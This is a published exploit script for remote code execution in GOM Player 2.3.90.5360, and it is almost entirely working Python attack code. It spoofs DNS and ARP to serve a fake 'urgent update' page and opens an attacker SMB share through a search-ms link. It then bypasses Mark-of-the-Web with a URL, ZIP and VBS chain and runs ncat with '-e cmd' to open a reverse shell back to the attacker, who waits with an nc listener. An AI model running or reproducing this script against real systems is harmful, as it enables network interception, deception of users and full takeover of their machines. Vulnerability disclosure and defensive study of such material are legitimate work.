GOM Player 2.3.90.5360 MITM / Remote Code Execution

`# Exploit Title: GOM Player 2.3.90.5360 - Remote Code Execution (RCE)  
# Date: 26.08.2023  
# Author: M. Akil Gündoğan  
# Contact: https://twitter.com/akilgundogan  
# Vendor Homepage: https://www.gomlab.com/gomplayer-media-player/  
# Software Link: https://cdn.gomlab.com/gretech/player/GOMPLAYERGLOBALSETUP_NEW.EXE  
# Version: 2.3.90.5360   
# Tested on: Windows 10 Pro x64 22H2 19045.3324  
# PoC Video: https://www.youtube.com/watch?v=8d0YUpdPzp8  
  
# Impacts: GOM player has been downloaded 63,952,102 times according to CNET. It is used by millions of people worldwide.  
  
# Vulnerability Description:   
# The IE component in the GOM Player's interface uses an insecure HTTP connection. Since IE is vulnerable to the   
# SMB/WebDAV+ "search-ms" technique, we can redirect the victim to the page we created with DNS spoofing and execute code on the target.  
# In addition, the URL+ZIP+VBS MoTW bypass technique was used to prevent the victim from seeing any warning in the pop-up window.   
  
# Full disclosure, developers should be more careful about software security.  
  
# Exploit Usage: Run it and enter the IP address of the target. Then specify the port to listen to for the reverse shell.  
  
# Some spaghetti and a bad code but it works :)  
  
banner = """\033[38;5;196m+-----------------------------------------------------------+  
| GOM Player 2.3.90.5360 - Remote Code Execution |  
| Test edildi, sinifta kaldi. Bu oyun hic bitmeyecek :-) |  
+-----------------------------------------------------------+\033[0m""" +"""   
\033[38;5;117m[*]- Author: M. Akil Gundogan - rootkit.com.tr\n\033[0m"""  
  
import time,os,zipfile,subprocess,socket,sys  
  
print(banner)  
  
if os.geteuid() != 0:  
print("You need root privileges to run the exploit, please use sudo...")  
sys.exit(1)  
  
targetIP = input("- Target IP address: ")  
listenPort = input("- Listening port for Reverse Shell: ")  
  
def fCreate(fileName,fileContent): # File create func.   
f = open(fileName,"w")  
f.write(fileContent)  
f.close()   
  
gw = os.popen("ip -4 route show default").read().split()  
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)  
s.connect((gw[2], 0))  
ipaddr = s.getsockname()[0]  
gateway = gw[2]  
host = socket.gethostname()  
print ("- My IP:", ipaddr, " Gateway:", gateway, " Host:", host)   
  
print("\n[*]- Stage 1: Downloading neccesary tools...")  
  
smbFolderName = "GomUpdater" # change this (optional)  
expWorkDir = "gomExploitDir" # change this (optional)  
os.system("mkdir " + expWorkDir +" >/dev/null 2>&1 &") # Creating a working directory for the exploit.  
time.sleep(1) # It's necessary for exploit stability.   
os.system("cd " + expWorkDir + "&& mkdir smb-shared web-shared >/dev/null 2>&1 &") # Creating a working directory for the exploit.  
time.sleep(1) # It's necessary for exploit stability.   
os.system("cd " + expWorkDir + "/smb-shared && wget https://nmap.org/dist/ncat-portable-5.59BETA1.zip >/dev/null 2>&1 && unzip -o -j ncat-portable-5.59BETA1.zip >/dev/null 2>&1 && rm -rf ncat-portable-5.59BETA1.zip README") #Downloading ncat  
print(" [*] - Ncat has been downloaded.")  
subprocess.run("git clone https://github.com/fortra/impacket.git " + expWorkDir + "/impacket >/dev/null 2>&1",shell=True) # Downloading Impacket  
print(" [*] - Impacket has been downloaded.")  
subprocess.run("git clone https://github.com/dtrecherel/DNSSpoof.git " + expWorkDir + "/dnsspoof >/dev/null 2>&1",shell=True) # Downloading DNSSpoof.py  
print(" [*] - DNSSpoof.py has been downloaded.")  
  
print("[*]- Stage 2: Creating Attacker SMB Server...")  
subprocess.Popen("cd " + expWorkDir + /impacket/examples && python3 smbserver.py "+smbFolderName+" ../../smb-shared -smb2support >/dev/null 2>&1",shell=True) # Running SMB server.  
time.sleep(5) # It's necessary for exploit stability.   
  
smbIP = ipaddr  
spoofUrl = "playinfo.gomlab.com" # Web page that causes vulnerability because it is used as HTTP  
  
print("[*]- Stage 3: Creating Attacker Web Page...")  
  
# change this (optional)   
screenExpPage = """  
<meta charset="utf-8">  
<script> window.alert("GOM Player için acil güncelleme yapılmalı ! Açılan pencerede lütfen updater'a tıklayın.");</script>   
<script>window.location.href= 'search-ms:displayname=GOM Player Updater&crumb=System.Generic.String%3AUpdater&crumb=location:%5C%5C"""+smbIP+"""';  
</script>  
"""  
  
fCreate(expWorkDir + "/web-shared/screen.html",screenExpPage)  
time.sleep(3) # It's necessary for exploit stability.   
  
print("[*]- Stage 4: Creating URL+VBS for MoTW bypass placing it into the ZIP archive...")  
vbsCommand = '''Set shell=CreateObject("wscript.shell")   
Shell.Run("xcopy /y \\\\yogurt\\ayran\\ncat.exe %temp%")  
WScript.Sleep 5000  
Shell.Run("cmd /c start /min cmd /c %temp%\\ncat.exe attackerIP attackerPort -e cmd")''' # change this (optional)  
vbsCommand = vbsCommand.replace("yogurt", smbIP).replace("ayran", smbFolderName).replace("attackerIP",smbIP).replace("attackerPort",listenPort)  
fCreate(expWorkDir + "/payload.vbs",vbsCommand)  
  
urlShortcut = '''[InternetShortcut]  
URL=file://'''+smbIP+"/"+smbFolderName+'''/archive.zip/payload.vbs  
IDlist='''  
fCreate(expWorkDir + "/smb-shared/Updater.url",urlShortcut)  
time.sleep(3) # It's necessary for exploit stability.   
zipName = expWorkDir + "/smb-shared/archive.zip"  
payload_filename = os.path.join(expWorkDir, "payload.vbs")   
  
with zipfile.ZipFile(zipName, "w") as malzip:  
malzip.write(payload_filename, arcname=os.path.basename(payload_filename))  
  
print("[*]- Stage 5: Running the attacker's web server...")  
subprocess.Popen("cd " + expWorkDir + "/web-shared && python3 -m http.server 80 >/dev/null 2>&1",shell=True) # Running attacker web server with Python mini http.server  
time.sleep(3) # It's necessary for exploit stability.   
  
print("[*]- Stage 6: Performing DNS and ARP spoofing for the target...")  
subprocess.Popen("python3 " + expWorkDir + "/dnsspoof/dnsspoof.py -d " + spoofUrl + " -t " + targetIP + ">/dev/null 2>&1",shell=True) # DNS Spoofing...  
time.sleep(10) # It's neccesary for exploit stability.  
os.system("ping -c 5 " + targetIP + " >/dev/null 2>&1 &") # Ping the target...   
os.system("arping -c 5 " + targetIP + " >/dev/null 2>&1 &") # ARPing the target.  
print("[*]- Stage 7: Waiting for the target to open GOM Player and execute the malicious URL shortcut...\n")  
subprocess.run("nc -lvnp " + listenPort,shell=True)  
subprocess.run("pkill -f smbserver.py & pkill -f http.server & pkill -f dnsspoof.py",shell=True) # Closing background processes after exploitation...  
`